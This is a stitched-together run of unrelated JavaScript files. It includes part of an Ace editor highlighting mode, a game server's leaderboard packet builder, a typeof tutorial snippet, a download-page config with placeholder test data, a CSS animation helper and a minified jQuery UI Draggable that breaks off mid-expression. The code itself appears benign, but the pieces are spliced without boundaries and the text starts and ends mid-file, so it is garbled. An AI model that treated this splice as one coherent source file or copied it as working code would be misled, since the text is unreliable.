"paren.quasi.start", regex : /\${/, push : "start" }, { token : "string.quasi.end", regex : /`/, next : "pop" }, { defaultToken: "string.quasi" }] }); if (!options || options.jsx != false) JSX.call(this); } this.embedRules(DocCommentHighlightRules, "doc-", [ DocCommentHighlightRules.getEndRule("no_regex") ]); this.normalizeRules(); }; oop.inherits(JavaScriptHighlightRules, TextHighlightRules); function JSX() { var tagRegex = identifierRe.replace("\\d", "\\d\\-"); var jsxTag = { onMatch : function(val, state, stack) { var offset = val.charAt(1) == "/" ? 2 : 1; if (offset == 1) { if (state != this.nextState) stack.unshift(this.next, this.nextState, 0); else stack.unshift(this.next); stack[2]++; } else if (offset == 2) { if (state == this.nextState) { stack[1]--; if (!stack[1] || stack[1] < 0) { stack.shift(); stack.shift(); } } } return [{ type: "meta.tag.punctuation." + (offset == 1 ? "" : "end-") + "tag-open.xml", value: val.slice(0, offset) }, { type: "meta.tag.tag-name.xml", value: val.substr(offset) }]; }, regex : "</?" + tagRegex + "", next: "jsxAttributes", nextState: "jsx" }; this.$rules.start.unshift(jsxTag); var jsxJsRule = { regex: "{", token: "paren.quasi.start", push: "start" }; this.$rules.jsx = [ jsxJsRule, jsxTag, {include : "reference"}, {defaultToken: "string"} ]; this.$rules.jsxAttributes = [{ token : "meta.tag.punctuation.tag-close.xml", regex : "/?>", onMatch : function(value, currentState, stack) { if (currentState == stack[0]) stack.shift(); if (value.length == 2) { if (stack[0] == this.nextState) stack[1]--; if (!stack[1] || stack[1] < 0) { stack.splice(0, 2); } } this.next = stack[0] || "start"; return [{type: this.token, value: value}]; }, nextState: "jsx" }, jsxJsRule, comments("jsxAttributes"), { token : "entity.other.attribute-name.xml", regex : tagRegex }, { token : "keyword.operator.attribute-equals.xml", regex : "=" }, { token : "text.tag-whitespace.xml", regex : "\\s+" }, { token : "string.attribute-value.xml", regex : "'", stateName : "jsx_attr_q", push : [ {token : "string.attribute-value.xml", regex: "'", next: "pop"}, {include : "reference"}, {defaultToken : "string.attribute-value.xml"} ] }, { token : "string.attribute-value.xml", regex : '"', stateName : "jsx_attr_qq", push : [ {token : "string.attribute-value.xml", regex: '"', next: "pop"}, {include : "reference"}, {defaultToken : "string.attribute-value.xml"} ] }, jsxTag ]; this.$rules.reference = [{ token : "constant.language.escape.reference.xml", regex : "(?:&#[0-9]+;)|(?:&#x[0-9a-fA-F]+;)|(?:&[a-zA-Z0-9_:\\.-]+;)" }]; } function comments(next) { return [ { token : "comment", // multi line comment regex : /\/\*/, next: [ DocCommentHighlightRules.getTagRule(), {token : "comment", regex : "\\*\\/", next : next || "pop"}, {defaultToken : "comment", caseInsensitive: true} ] }, { token : "comment", regex : "\\/\\/", next: [ DocCommentHighlightRules.getTagRule(), {token : "comment", regex : "$|^", next : next || "pop"}, {defaultToken : "comment", caseInsensitive: true} ] } ]; } exports.JavaScriptHighlightRules = JavaScriptHighlightRules; }); define("ace/mode/matching_brace_outdent",["require","exports","module","ace/range"], function(require, exports, module) { "use strict"; var Range = require("../range").Range; var MatchingBraceOutdent = function() {}; (function() { this.checkOutdent = function(line, input) { if (! /^\s+$/.test(line)) return false; return /^\s*\}/.test(input); }; this.autoOutdent = function(doc, row) { var line = doc.getLine(row); var match = line.match(/^(\s*\})/); if (!match) return 0; var column = match[1].length; var openBracePos = doc.findMatchingBracket({row: row, column: column}); if (!openBracePos || openBracePos.row == row) return 0; var indent = this.$getIndent(doc.getLine(openBracePos.row)); doc.replace(new Range(row, 0, row, column-1), indent); }; this.$getIndent = function(line) { return line.match(/^\s*/)[0]; }; }).call(MatchingBraceOutdent.prototype); exports.MatchingBraceOutdent = MatchingBraceOutdent; }); define("ace/mode/folding/cstyle",["require","exports","module","ace/lib/oop","ace/range","ace/mode/folding/fold_mode"], function(require, exports, module) { "use strict"; var oop = require("../../lib/oop"); var Range = require("../../range").Range; var BaseFoldMode = require("./fold_mode").FoldMode; var FoldMode = exports.FoldMode = function(commentRegex) { if (commentRegex) { this.foldingStartMarker = new RegExp( this.foldingStartMarker.source.replace(/\|[^|]*?$/, "|" + commentRegex.start) ); this.foldingStopMarker = new RegExp( this.foldingStopMarker.source.replace(/\|[^|]*?$/, "|" + commentRegex.end) ); } }; oop.inherits(FoldMode, BaseFoldMode); (function() { this.foldingStartMarker = /([\{\[\(])[^\}\]\)]*$|^\s*(\/\*)/; this.foldingStopMarker = /^[^\[\{\(]*([\}\]\)])|^[\s\*]*(\*\/)/; this.singleLineBlockCommentRe= /^\s*(\/\*).*\*\/\s*$/; this.tripleStarBlockCommentRe = /^\s*(\/\*\*\*).*\*\/\s*$/; this.startRegionRe = /^\s*(\/\*|\/\/)#?region\b/; this._getFoldWidgetBase = this.getFoldWidget; this.getFoldWidget = function(session, foldStyle, row) { var line = session.getLine(row); if (this.singleLineBlockCommentRe.test(line)) { if (!this.startRegionRe.test(line) && !this.tripleStarBlockCommentRe.test(line)) return ""; } var fw = this._getFoldWidgetBase(session, foldStyle, row); if (!fw && this.startRegionRe.test(line)) return "start"; // lineCommentRegionStart return fw; }; this.getFoldWidgetRange = function(session, foldStyle, row, forceMultiline) { var line = session.getLine(row); if (this.startRegionRe.test(line)) return this.getCommentRegionBlock(session, line, row); var match = line.match(this.foldingStartMarker); if (match) { var i = match.index; if (match[1]) return this.openingBracketBlock(session, match[1], row, i); var range = session.getCommentFoldRange(row, i + match[0].length, 1); if (range && !range.isMultiLine()) { if (forceMultiline) { range = this.getSectionRange(session, row); } else if (foldStyle != "all") range = null; } return range; } if (foldStyle === "markbegin") return; var match = line.match(this.foldingStopMarker); if (match) { var i = match.index + match[0].length; if (match[1]) return this.closingBracketBlock(session, match[1], row, i); return session.getCommentFoldRange(row, i, -1); } }; this.getSectionRange = function(session, row) { var line = session.getLine(row); var startIndent = line.search(/\S/); var startRow = row; var startColumn = line.length; row = row + 1; var endRow = row; var maxRow = session.getLength(); while (++row < maxRow) { line = session.getLine(row); var indent = line.search(/\S/); if (indent === -1) continue; if (startIndent > indent) break; var subRange = this.getFoldWidgetRange(session, "all", row); if (subRange) { if (subRange.start.row <= startRow) { break; } else if (subRange.isMultiLine()) { row = subRange.end.row; } else if (startIndent == indent) { break; } } endRow = row; } return new Range(startRow, startColumn, endRow, session.getLine(endRow).length); }; this.getCommentRegionBlock = function(session, line, row) { var startColumn = line.search(/\s*$/); var maxRow = session.getLength(); var startRow = row; var re = /^\s*(?:\/\*|\/\/|--)#?(end)?region\b/; var depth = 1; while (++row < maxRow) { line = session.getLine(row); var m = re.exec(line); if (!m) continue; if (m[1]) depth--; else depth++; if (!depth) break; } var endRow = row; if (endRow > startRow) { return new Range(startRow, startColumn, endRow, line.length); } }; }).call(FoldMode.prototype); }); define("ace/mode/javascript",["require","exports","module","ace/lib/oop","ace/mode/text","ace/mode/javascript_highlight_rules","ace/mode/matching_brace_outdent","ace/worker/worker_client","ace/mode/behaviour/cstyle","ace/mode/folding/cstyle"], function(require, exports, module) { "use strict"; var oop = require("../lib/oop"); var TextMode = require("./text").Mode; var JavaScriptHighlightRules = require("./javascript_highlight_rules").JavaScriptHighlightRules; var MatchingBraceOutdent = require("./matching_brace_outdent").MatchingBraceOutdent; var WorkerClient = require("../worker/worker_client").WorkerClient; var CstyleBehaviour = require("./behaviour/cstyle").CstyleBehaviour; var CStyleFoldMode = require("./folding/cstyle").FoldMode; var Mode = function() { this.HighlightRules = JavaScriptHighlightRules; this.$outdent = new MatchingBraceOutdent(); this.$behaviour = new CstyleBehaviour(); this.foldingRules = new CStyleFoldMode(); }; oop.inherits(Mode, TextMode); (function() { this.lineCommentStart = "//"; this.blockComment = {start: "/*", end: "*/"}; this.$quotes = {'"': '"', "'": "'", "`": "`"}; this.getNextLineIndent = function(state, line, tab) { var indent = this.$getIndent(line); var tokenizedLine = this.getTokenizer().getLineTokens(line, state); var tokens = tokenizedLine.tokens; var endState = tokenizedLine.state; if (tokens.length && tokens[tokens.length-1].type == "comment") { return indent; } if (state == "start" || state == "no_regex") { var match = line.match(/^.*(?:\bcase\b.*:|[\{\(\[])\s*$/); if (match) { indent += tab; } } else if (state == "doc-start") { if (endState == "start" || endState == "no_regex") { return ""; } var match = line.match(/^\s*(\/?)\*/); if (match) { if (match[1]) { indent += " "; } indent += "* "; } } return indent; }; this.checkOutdent = function(state, line, input) { return this.$outdent.checkOutdent(line, input); }; this.autoOutdent = function(state, doc, row) { this.$outdent.autoOutdent(doc, row); }; this.createWorker = function(session) { var worker = new WorkerClient(["ace"], "ace/mode/javascript_worker", "JavaScriptWorker"); worker.attachToDocument(session.getDocument()); worker.on("annotate", function(results) { session.setAnnotations(results.data); }); worker.on("terminate", function() { session.clearAnnotations(); }); return worker; }; this.$id = "ace/mode/javascript"; this.snippetFileId = "ace/snippets/javascript"; }).call(Mode.prototype); exports.Mode = Mode; }); define("ace/mode/typescript_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/javascript_highlight_rules"], function (require, exports, module) { "use strict"; var oop = require("../lib/oop"); var JavaScriptHighlightRules = require("./javascript_highlight_rules").JavaScriptHighlightRules; var TypeScriptHighlightRules = function (options) { var tsRules = [ { token: ["storage.type", "text", "entity.name.function.ts"], regex: "(function)(\\s+)([a-zA-Z0-9\$_\u00a1-\uffff][a-zA-Z0-9\d\$_\u00a1-\uffff]*)" }, { token: "keyword", regex: "(?:\\b(constructor|declare|interface|as|AS|public|private|extends|export|super|readonly|module|namespace|abstract|implements)\\b)" }, { token: ["keyword", "storage.type.variable.ts"], regex: "(class|type)(\\s+[a-zA-Z0-9_?.$][\\w?.$]*)" }, { token: "keyword", regex: "\\b(?:super|export|import|keyof|infer)\\b" }, { token: ["storage.type.variable.ts"], regex: "(?:\\b(this\\.|string\\b|bool\\b|boolean\\b|number\\b|true\\b|false\\b|undefined\\b|any\\b|null\\b|(?:unique )?symbol\\b|object\\b|never\\b|enum\\b))" } ]; var JSRules = new JavaScriptHighlightRules({jsx: (options && options.jsx) == true}).getRules(); JSRules.no_regex = tsRules.concat(JSRules.no_regex); this.$rules = JSRules; }; oop.inherits(TypeScriptHighlightRules, JavaScriptHighlightRules); exports.TypeScriptHighlightRules = TypeScriptHighlightRules; }); define("ace/mode/typescript",["require","exports","module","ace/lib/oop","ace/mode/javascript","ace/mode/typescript_highlight_rules","ace/mode/behaviour/cstyle","ace/mode/folding/cstyle","ace/mode/matching_brace_outdent"], function(require, exports, module) { "use strict"; var oop = require("../lib/oop"); var jsMode = require("./javascript").Mode; var TypeScriptHighlightRules = require("./typescript_highlight_rules").TypeScriptHighlightRules; var CstyleBehaviour = require("./behaviour/cstyle").CstyleBehaviour; var CStyleFoldMode = require("./folding/cstyle").FoldMode; var MatchingBraceOutdent = require("./matching_brace_outdent").MatchingBraceOutdent; var Mode = function() { this.HighlightRules = TypeScriptHighlightRules; this.$outdent = new MatchingBraceOutdent(); this.$behaviour = new CstyleBehaviour(); this.foldingRules = new CStyleFoldMode(); }; oop.inherits(Mode, jsMode); (function() { this.createWorker = function(session) { return null; }; this.$id = "ace/mode/typescript"; }).call(Mode.prototype); exports.Mode = Mode; }); (function() { window.require(["ace/mode/typescript"], function(m) { if (typeof module == "object" && typeof exports == "object" && module) { module.exports = m; } }); })();
// Import var BinaryWriter = require("./BinaryWriter"); function writeCount(writer, flag1, flag2) { writer.writeUInt8(flag1); // Packet ID writer.writeUInt32(flag2 >>> 0); // Number of elements } class UpdateLeaderboard { constructor(playerTracker, leaderboard, leaderboardType) { this.playerTracker = playerTracker; this.leaderboard = leaderboard; this.leaderboardType = leaderboardType; this.leaderboardCount = Math.min(leaderboard.length, playerTracker.server.config.serverMaxLB); } build(protocol) { switch (this.leaderboardType) { case 48: // UserText if (protocol < 11) return this.buildUserText(protocol); else return this.buildUserText14(); case 49: // FFA if (protocol < 6) return this.buildFfa5(); else if (protocol < 11) return this.buildFfa6(); else return this.buildFfa(protocol); // 13/14 case 50: // Team return this.buildTeam(); default: return null; } } // User text all other protocols buildUserText(protocol) { var writer = new BinaryWriter(); writeCount(writer, 0x31, this.leaderboard.length); for (var i = 0; i < this.leaderboard.length; i++) { var item = this.leaderboard[i] || ""; if (protocol < 11) writer.writeUInt32(0); if (protocol < 6) writer.writeStringZeroUnicode(item); else writer.writeStringZeroUtf8(item); } return writer.toBuffer(); } // User text 14 buildUserText14() { var writer = new BinaryWriter(); writer.writeUInt8(0x35); for (var i = 0; i < this.leaderboard.length; i++) { var item = this.leaderboard[i] || ""; writer.writeUInt8(0x02); writer.writeStringZeroUtf8(item); } return writer.toBuffer(); } // FFA protocol 5 buildFfa5() { var writer = new BinaryWriter(); writeCount(writer, 0x31, this.leaderboardCount); for (var i = 0; i < this.leaderboardCount; i++) { var item = this.leaderboard[i]; if (item == null) return null; // bad leaderboardm just don't send it var name = item._nameUnicode; var id = 0; if (item == this.playerTracker && item.cells.length) id = item.cells[0].nodeId ^ this.playerTracker.scrambleId; writer.writeUInt32(id >>> 0); // Player cell Id if (name) writer.writeBytes(name); else writer.writeUInt16(0); } return writer.toBuffer(); } // FFA protocol 6 buildFfa6() { var writer = new BinaryWriter(); writeCount(writer, 0x31, this.leaderboardCount); for (var i = 0; i < this.leaderboardCount; i++) { var item = this.leaderboard[i]; if (item == null) return null; // bad leaderboard just don't send it var name = item._nameUtf8; var id = item == this.playerTracker ? 1 : 0; writer.writeUInt32(id >>> 0); // isMe flag if (name) writer.writeBytes(name); else writer.writeUInt8(0); } return writer.toBuffer(); } // FFA protocol 11 /* It was switched off anyway, however not removing yet UpdateLeaderboard.prototype.buildFfa11 = function() { var pos = require('./LeaderboardPosition'); this.playerTracker.socket.packetHandler.sendPacket(new pos(this.leaderboard.indexOf(this.playerTracker) + 1)); var writer = new BinaryWriter(); writeCount(writer, 0x31, this.leaderboardCount); for (var i = 0; i < this.leaderboardCount; i++) { var item = this.leaderboard[i]; if (item == null) return null; // bad leaderboard just don't send it var name = item._nameUtf8; if (name) writer.writeBytes(name); else writer.writeUInt8(0); } return writer.toBuffer(); }; */ // FFA protocol 13/14 buildFfa(protocol) { var writer = new BinaryWriter(); if (protocol < 14) writer.writeUInt8(0x33); // 13 else writer.writeUInt8(0x35); // 14 for (var i = 0; i < this.leaderboardCount; i++) { var item = this.leaderboard[i]; if (item == null) return null; // bad leaderboard just don't send it if (item === this.playerTracker) { writer.writeUInt8(0x09); writer.writeUInt16(1); } else { var name = item._name; writer.writeUInt8(0x02); if (name != null && name.length) writer.writeStringZeroUtf8(name); else writer.writeUInt8(0); } } var thing = this.leaderboard.indexOf(this.playerTracker) + 1; var place = (thing <= 10) ? null : thing; if (this.playerTracker.cells.length && place != null) { writer.writeUInt8(0x09); writer.writeUInt16(place); } return writer.toBuffer(); } // Party // TODO: Implement the "minimap" buildParty() { var protocol13s = 0; for (var i in this.playerTracker.server.clients) { var client = this.playerTracker.server.clients[i].packetHandler; if (client.protocol >= 13) protocol13s++; } var writer = new BinaryWriter(); writer.writeUInt8(0x34); // Packet ID writer.writeUInt16(protocol13s); // How many friends are in-game for (var i = 0; i < this.leaderboardCount; i++) { var item = this.leaderboard[i]; if (item == null) return null; // bad leaderboard just don't send it if (item === this.playerTracker) { writer.writeUInt8(0x09); writer.writeUInt16(1); } else { var name = item._name; writer.writeUInt8(0x02); if (name != null && name.length) writer.writeStringZeroUtf8(name); else writer.writeUInt8(0); } } var thing = this.leaderboard.indexOf(this.playerTracker) + 1; var place = (thing <= 10) ? null : thing; if (this.playerTracker.cells.length && place != null) { writer.writeUInt16(place); } return writer.toBuffer(); } // Team buildTeam() { var writer = new BinaryWriter(); writeCount(writer, 0x32, this.leaderboard.length); for (var i = 0; i < this.leaderboard.length; i++) { var value = this.leaderboard[i]; if (value == null) return null; // bad leaderboardm just don't send it if (isNaN(value)) value = 0; value = value < 0 ? 0 : value; value = value > 1 ? 1 : value; writer.writeFloat(value); // isMe flag (previously cell ID) } return writer.toBuffer(); } } module.exports = UpdateLeaderboard;
var varUndefined; // undefined // var varNull = null; var varBoolean = true; var varText = "var can be used in all the program "; let letText = "let can be used in code scope"; const constText = "const is a constants that never change"; const constpi = 3.14; // const is a constants that never change. var number = 33; console.warn('JavaScript 7 different data types:'); console.warn('undefined, null, boolean, string, symbol, number, object. '); console.log('01. variableNotDeclared ==> ' + typeof (variableNotDeclared)); console.log('02. varUndefined ==> ' + typeof (varUndefined) + ' ==> ' + varUndefined); console.log('03. varNull ==> ' + typeof (varNull) + ' ==> ' + varNull); console.log('04. varBoolean ==> ' + typeof (varBoolean) + ' ==> ' + varBoolean); console.log('05. varText ==> ' + typeof (varText) + ' ==> ' + varText); console.log('06. letText ==> ' + typeof (letText) + ' ==> ' + letText); console.log('07. constText ==> ' + typeof (constText) + ' ==> ' + constText); console.log('08. constpi ==> ' + typeof (constpi) + ' ==> ' + constpi); console.log('09. number ==> ' + typeof (number) + ' ==> ' + number);
downloadBg({"download_bg":"/template/youku_m/images/051000005B7E8D85AD9AB7725B0D01C2.png", "download_btn":"/template/youku_m/images/TB1tOnhSpXXXXafXXXXXXXXXXXX.png", "buttonText":"测试代码","Bizid":"common","person":"234","orderType":"video", "targetUrl":"#","picUrl":"","title":"下载标题地址", "videoId":"123","orderContent":"密令内容可编辑,测试数据123", "downsource":[{"key":"laiyuan1","value":"http://down2.uc.cn/youku/down.php?pub=83f4a52825e07aca"}, {"key":"laiyuan2","value":"http://down2.uc.cn/youku/down.php?pub=83f4a52825e07acasd"}], "wxdownload_bg":"/template/youku_m/images/TB1r.l.e4GYBuNjy0FnXXX5lpXa-750-1217.jpg","paramArray": [{"autodown":false,"speType":"fkdj", "download_bg":"/template/youku_m/images/TB1KrZqX_tYBeNjy1XdXXXXyVXa-750-1334.jpg", "download_btn":"/template/youku_m/images/TB1tOnhSpXXXXafXXXXXXXXXXXX.png"}], "autodown":true,"wxdownload_btn":"/template/youku_m/images/TB1tOnhSpXXXXafXXXXXXXXXXXX.png"})
const unexpectedBehaviorCount = testResult => { const { result } = testResult; const { details } = result || {}; const { summary } = details || {}; if (!details || !summary) return 0; return summary.unexpectedCount; }; module.exports = unexpectedBehaviorCount;
/** * Created by jibin on 2017/12/27. */ import Event from './Event'; import classes from 'component-classes'; const isCSSAnimationSupported = Event.endEvents.length !== 0; const capitalPrefixes = [ 'Webkit', 'Moz', 'O', 'ms' ]; const prefixes = ['-webkit-', '-moz-', '-o-', 'ms-', '']; function getStyleProperty(node, name){ const style = window.getComputedStyle(node, null); let ret = ''; for(let i=0, len=prefixes.length; i<len; i++){ ret = style.getPropertyValue(prefixes[i] + name); if(ret){ break; } } return ret; } function fixBrowserByTimeout(node){ if(isCSSAnimationSupported){ const transitionDelay = parseFloat(getStyleProperty(node, 'transition-delay')) || 0; const transitionDuration = parseFloat(getStyleProperty(node, 'transition-duration')) || 0; const animationDelay = parseFloat(getStyleProperty(node, 'animation-delay')) || 0; const animationDuration = parseFloat(getStyleProperty(node, 'animation-duration')) || 0; const time = Math.max(transitionDuration + transitionDelay, animationDuration + animationDelay); node.rcEndAnimTimeout = setTimeout(()=>{ node.rcEndAnimTimeout = null; if(node.rcEndListener){ node.rcEndListener(); } }, time * 1000 + 200); } } function clearBrowserBugTimeout(node){ if(node.rcEndAnimTimeout){ clearTimeout(node.rcEndAnimTimeout); node.rcEndAnimTimeout = null; } } const CSSAnimation = (node, transitionName, endCallback)=>{ const nameIsObj = typeof transitionName === 'object'; const className = nameIsObj ? transitionName.name : transitionName; const activeClassName = nameIsObj ? transitionName.active : `${transitionName}-active`; let end = endCallback; let start; let active; const nodeClasses = classes(node); if(endCallback && Object.prototype.toString.call(endCallback).slice(8, -1) === 'Object'){ end = endCallback.end; start = endCallback.start; active = endCallback.active; } if(node.rcEndListener){ node.rcEndListener(); } node.rcEndListener = e => { if(e && e.target !== node){ return; } if(node.rcEndAnimTimeout){ clearTimeout(node.rcAnimTimeout); node.rcEndAnimTimeout = null; } clearBrowserBugTimeout(node); nodeClasses.remove(className); nodeClasses.remove(activeClassName); Event.removeEndEventListener(node, node.rcEndListener); node.rcEndListener = null; if(end) {end();} }; Event.addEndEventListener(node, node.rcEndListener); if(start) {start();} nodeClasses.add(className); node.rcEndAnimTimeout = setTimeout(()=>{ node.rcEndAnimTimeout = null; nodeClasses.add(activeClassName); if(active){ setTimeout(active, 0); } fixBrowserByTimeout(node); }, 30); return { stop(){ if(node.rcEndListener){ node.rcEndListener(); } } }; }; CSSAnimation.style = (node, style, callback)=>{ if(node.rcEndListener){ node.rcEndListener(); } node.rcEndListener = e=>{ if(e && e.target !== node){ return; } if(node.rcAnimTimeout){ clearTimeout(node.rcAnimTimeout); node.rcEndAnimTimeout = null; } clearBrowserBugTimeout(node); Event.removeEndEventListener(node, node.rcEndListener); node.rcEndListener = null; if(callback){ callback(); } }; Event.addEndEventListener(node, node.rcEndListener); node.rcAnimTimeout = setTimeout(()=>{ for(const s in style){ if(style.hasOwnProperty(s)){ node.style[s] = style[s]; } } node.rcAnimTimeout = null; fixBrowserByTimeout(node); }, 0); }; CSSAnimation.setTransition = (node, p, value)=>{ let property = p; let v = value; if (value === undefined) { v = property; property = ''; } property = property || ''; capitalPrefixes.forEach((prefix) => { node.style[`${prefix}Transition${property}`] = v; }); }; CSSAnimation.isCSSAnimationSupported = isCSSAnimationSupported; export { isCSSAnimationSupported, }; export default CSSAnimation;
/* * jQuery UI Draggable 1.8.16 * * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about) * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * http://docs.jquery.com/UI/Draggables * * Depends: * jquery.ui.core.js * jquery.ui.mouse.js * jquery.ui.widget.js */ (function(d){d.widget("ui.draggable",d.ui.mouse,{widgetEventPrefix:"drag",options:{addClasses:true,appendTo:"parent",axis:false,connectToSortable:false,containment:false,cursor:"auto",cursorAt:false,grid:false,handle:false,helper:"original",iframeFix:false,opacity:false,refreshPositions:false,revert:false,revertDuration:500,scope:"default",scroll:true,scrollSensitivity:20,scrollSpeed:20,snap:false,snapMode:"both",snapTolerance:20,stack:false,zIndex:false},_create:function(){if(this.options.helper== "original"&&!/^(?:r|a|f)/.test(this.element.css("position")))this.element[0].style.position="relative";this.options.addClasses&&this.element.addClass("ui-draggable");this.options.disabled&&this.element.addClass("ui-draggable-disabled");this._mouseInit()},destroy:function(){if(this.element.data("draggable")){this.element.removeData("draggable").unbind(".draggable").removeClass("ui-draggable ui-draggable-dragging ui-draggable-disabled");this._mouseDestroy();return this}},_mouseCapture:function(a){var b= this.options;if(this.helper||b.disabled||d(a.target).is(".ui-resizable-handle"))return false;this.handle=this._getHandle(a);if(!this.handle)return false;if(b.iframeFix)d(b.iframeFix===true?"iframe":b.iframeFix).each(function(){d('<div class="ui-draggable-iframeFix" style="background: #fff;"></div>').css({width:this.offsetWidth+"px",height:this.offsetHeight+"px",position:"absolute",opacity:"0.001",zIndex:1E3}).css(d(this).offset()).appendTo("body")});return true},_mouseStart:function(a){var b=this.options; this.helper=this._createHelper(a);this._cacheHelperProportions();if(d.ui.ddmanager)d.ui.ddmanager.current=this;this._cacheMargins();this.cssPosition=this.helper.css("position");this.scrollParent=this.helper.scrollParent();this.offset=this.positionAbs=this.element.offset();this.offset={top:this.offset.top-this.margins.top,left:this.offset.left-this.margins.left};d.extend(this.offset,{click:{left:a.pageX-this.offset.left,top:a.pageY-this.offset.top},parent:this._getParentOffset(),relative:this._getRelativeOffset()}); this.originalPosition=this.position=this._generatePosition(a);this.originalPageX=a.pageX;this.originalPageY=a.pageY;b.cursorAt&&this._adjustOffsetFromHelper(b.cursorAt);b.containment&&this._setContainment();if(this._trigger("start",a)===false){this._clear();return false}this._cacheHelperProportions();d.ui.ddmanager&&!b.dropBehaviour&&d.ui.ddmanager.prepareOffsets(this,a);this.helper.addClass("ui-draggable-dragging");this._mouseDrag(a,true);d.ui.ddmanager&&d.ui.ddmanager.dragStart(this,a);return true}, _mouseDrag:function(a,b){this.position=this._generatePosition(a);this.positionAbs=this._convertPositionTo("absolute");if(!b){b=this._uiHash();if(this._trigger("drag",a,b)===false){this._mouseUp({});return false}this.position=b.position}if(!this.options.axis||this.options.axis!="y")this.helper[0].style.left=this.position.left+"px";if(!this.options.axis||this.options.axis!="x")this.helper[0].style.top=this.position.top+"px";d.ui.ddmanager&&d.ui.ddmanager.drag(this,a);return false},_mouseStop:function(a){var b= false;if(d.ui.ddmanager&&!this.options.dropBehaviour)b=d.ui.ddmanager.drop(this,a);if(this.dropped){b=this.dropped;this.dropped=false}if((!this.element[0]||!this.element[0].parentNode)&&this.options.helper=="original")return false;if(this.options.revert=="invalid"&&!b||this.options.revert=="valid"&&b||this.options.revert===true||d.isFunction(this.options.revert)&&this.options.revert.call(this.element,b)){var c=this;d(this.helper).animate(this.originalPosition,parseInt(this.options.revertDuration, 10),function(){c._trigger("stop",a)!==false&&c._clear()})}else this._trigger("stop",a)!==false&&this._clear();return false},_mouseUp:function(a){this.options.iframeFix===true&&d("div.ui-draggable-iframeFix").each(function(){this.parentNode.removeChild(this)});d.ui.ddmanager&&d.ui.ddmanager.dragStop(this,a);return d.ui.mouse.prototype._mouseUp.call(this,a)},cancel:function(){this.helper.is(".ui-draggable-dragging")?this._mouseUp({}):this._clear();return this},_getHandle:function(a){var b=!this.options.handle|| !d(this.options.handle,this.element).length?true:false;d(this.options.handle,this.element).find("*").andSelf().each(function(){if(this==a.target)b=true});return b},_createHelper:function(a){var b=this.options;a=d.isFunction(b.helper)?d(b.helper.apply(this.element[0],[a])):b.helper=="clone"?this.element.clone().removeAttr("id"):this.element;a.parents("body").length||a.appendTo(b.appendTo=="parent"?this.element[0].parentNode:b.appendTo);a[0]!=this.element[0]&&!/(fixed|absolute)/.test(a.css("position"))&& a.css("position","absolute");return a},_adjustOffsetFromHelper:function(a){if(typeof a=="string")a=a.split(" ");if(d.isArray(a))a={left:+a[0],top:+a[1]||0};if("left"in a)this.offset.click.left=a.left+this.margins.left;if("right"in a)this.offset.click.left=this.helperProportions.width-a.right+this.margins.left;if("top"in a)this.offset.click.top=a.top+this.margins.top;if("bottom"in a)this.offset.click.top=this.helperProportions.height-a.bottom+this.margins.top},_getParentOffset:function(){this.offsetParent= this.helper.offsetParent();var a=this.offsetParent.offset();if(this.cssPosition=="absolute"&&this.scrollParent[0]!=document&&d.ui.contains(this.scrollParent[0],this.offsetParent[0])){a.left+=this.scrollParent.scrollLeft();a.top+=this.scrollParent.scrollTop()}if(this.offsetParent[0]==document.body||this.offsetParent[0].tagName&&this.offsetParent[0].tagName.toLowerCase()=="html"&&d.browser.msie)a={top:0,left:0};return{top:a.top+(parseInt(this.offsetParent.css("borderTopWidth"),10)||0),left:a.left+(parseInt(this.offsetParent.css("borderLeftWidth"), 10)||0)}},_getRelativeOffset:function(){if(this.cssPosition=="relative"){var a=this.element.position();return{top:a.top-(parseInt(this.helper.css("top"),10)||0)+this.scrollParent.scrollTop(),left:a.left-(parseInt(this.helper.css("left"),10)||0)+this.scrollParent.scrollLeft()}}else return{top:0,left:0}},_cacheMargins:function(){this.margins={left:parseInt(this.element.css("marginLeft"),10)||0,top:parseInt(this.element.css("marginTop"),10)||0,right:parseInt(this.element.css("marginRight"),10)||0,bottom:parseInt(this.element.css("marginBottom"), 10)||0}},_cacheHelperProportions:function(){this.helperProportions={width:this.helper.outerWidth(),height:this.helper.outerHeight()}},_setContainment:function(){var a=this.options;if(a.containment=="parent")a.containment=this.helper[0].parentNode;if(a.containment=="document"||a.containment=="window")this.containment=[a.containment=="document"?0:d(window).scrollLeft()-this.offset.relative.left-this.offset.parent.left,a.containment=="document"?0:d(window).scrollTop()-this.offset.relative.top-this.offset.parent.top, (a.containment=="document"?0:d(window).scrollLeft())+d(a.containment=="document"?document:window).width()-this.helperProportions.width-this.margins.left,(a.containment=="document"?0:d(window).scrollTop())+(d(a.containment=="document"?document:window).height()||document.body.parentNode.scrollHeight)-this.helperProportions.height-this.margins.top];if(!/^(document|window|parent)$/.test(a.containment)&&a.containment.constructor!=Array){a=d(a.containment);var b=a[0];if(b){a.offset();var c=d(b).css("overflow")!= "hidden";this.containment=[(parseInt(d(b).css("borderLeftWidth"),10)||0)+(parseInt(d(b).css("paddingLeft"),10)||0),(parseInt(d(b).css("borderTopWidth"),10)||0)+(parseInt(d(b).css("paddingTop"),10)||0),(c?Math.max(b.scrollWidth,b.offsetWidth):b.offsetWidth)-(parseInt(d(b).css("borderLeftWidth"),10)||0)-(parseInt(d(b).css("paddingRight"),10)||0)-this.helperProportions.width-this.margins.left-this.margins.right,(c?Math.max(b.scrollHeight,b.offsetHeight):b.offsetHeight)-(parseInt(d(b).css("borderTopWidth"), 10)||0)-(parseInt(d(b).css("paddingBottom"),10)||0)-this.helperProportions.height-this.margins.top-this.margins.bottom];this.relative_container=a}}else if(a.containment.constructor==Array)this.containment=a.containment},_convertPositionTo:function(a,b){if(!b)b=this.position;a=a=="absolute"?1:-1;var c=this.cssPosition=="absolute"&&!(this.scrollParent[0]!=document&&d.ui.contains(this.scrollParent[0],this.offsetParent[0]))?this.offsetParent:this.scrollParent,f=/(html|body)/i.test(c[0].tagName);return{top:b.top+ this.offset.relative.top*a+this.offset.parent.top*a-(d.browser.safari&&d.browser.version<526&&this.cssPosition=="fixed"?0:(this.cssPosition=="fixed"?-this.scrollParent.scrollTop():f?0:c.scrollTop())*a),left:b.left+this.offset.relative.left*a+this.offset.parent.left*a-(d.browser.safari&&d.browser.version<526&&this.cssPosition=="fixed"?0:(this.cssPosition=="fixed"?-this.scrollParent.scrollLeft():f?0:c.scrollLeft())*a)}},_generatePosition:function(a){var b=this.options,c=this.cssPosition=="absolute"&& 